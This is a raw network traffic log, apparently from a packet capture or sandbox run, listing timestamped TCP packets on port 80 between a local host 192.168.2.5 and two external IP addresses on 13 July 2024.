                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830722094 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830796003 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830810070 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830847979 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830857038 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830857038 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830862999 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830904007 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830993891 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.831010103 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.831023932 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.831039906 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.831056118 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.831058025 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.831058025 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.831079006 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.831079006 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.831110954 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.831151962 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.831152916 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.832528114 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.832544088 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.832560062 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.832598925 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.832598925 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.832628965 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.832643986 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.832659960 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.832700014 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.832700014 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836354017 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836397886 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836404085 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836437941 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836525917 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836560965 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836600065 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836615086 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836637974 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836656094 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836728096 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836743116 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836759090 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836783886 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836783886 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836801052 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836821079 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836837053 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836852074 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836863995 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836869001 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836895943 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836895943 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.836941004 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837487936 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837527990 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837537050 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837543011 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837601900 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837641954 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837656975 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837671995 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837683916 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837687969 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837713957 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837713957 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837745905 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837752104 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837766886 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.837832928 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838386059 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838399887 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838416100 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838439941 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838469982 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838548899 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838571072 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838587046 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838604927 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838608980 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838608980 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838608980 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838638067 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838648081 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838663101 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838677883 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838694096 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838720083 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838720083 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.838763952 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839323997 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839370966 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839380026 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839395046 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839443922 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839443922 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839457035 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839473009 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839488029 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839510918 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839510918 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839582920 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839585066 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839597940 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839612961 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839629889 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839664936 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.839664936 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840348005 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840363026 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840383053 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840409994 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840420961 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840420961 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840425968 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840440989 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840456963 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840486050 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840486050 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840517044 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840559959 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840575933 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840605974 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.840605974 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864427090 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864527941 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864566088 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864598989 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864634037 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864670038 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864680052 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864680052 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864680052 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864708900 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864718914 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864739895 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864756107 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.864788055 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880104065 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880152941 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880211115 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880247116 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880264997 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880264997 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880264997 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880299091 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880300999 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880336046 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880346060 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880371094 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880382061 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880424976 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880458117 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880475998 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880475998 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880506039 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880528927 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880563021 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880572081 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880599022 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880610943 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880631924 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880644083 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880669117 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880676985 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880703926 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880719900 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.880861044 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.913758993 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.913805008 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.913820982 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.913846970 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.913862944 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.913881063 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.913881063 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.913943052 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.913944960 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.913960934 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.913979053 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914016008 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914016008 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914156914 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914172888 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914187908 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914202929 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914217949 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914221048 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914221048 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914232969 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914247036 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914247036 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914248943 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914258957 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914285898 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914285898 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914381027 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914397001 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914439917 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914439917 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914554119 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914570093 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914632082 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914665937 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914681911 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914697886 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914711952 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914722919 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914727926 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914742947 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914755106 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914802074 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914825916 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914887905 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914941072 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914956093 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914978027 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.914978027 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.915004015 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.915065050 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.915080070 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.915095091 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.915111065 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.915126085 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.915126085 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.915154934 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.915154934 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.915164948 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.915379047 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.916824102 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.916847944 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.916862011 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.916888952 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.916959047 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.916974068 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.916990042 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917005062 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917022943 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917022943 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917052984 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917052984 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917076111 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917099953 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917172909 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917181969 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917197943 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917212963 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917227983 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917237043 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917237043 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917294025 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917294025 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917320967 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917336941 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917351961 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917365074 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917366982 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917391062 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917391062 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917433977 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917455912 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917471886 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917486906 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917501926 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917516947 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917517900 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917553902 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917553902 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917658091 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917675018 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917689085 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917723894 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917757034 CEST5898280192.168.2.577.91.77.81
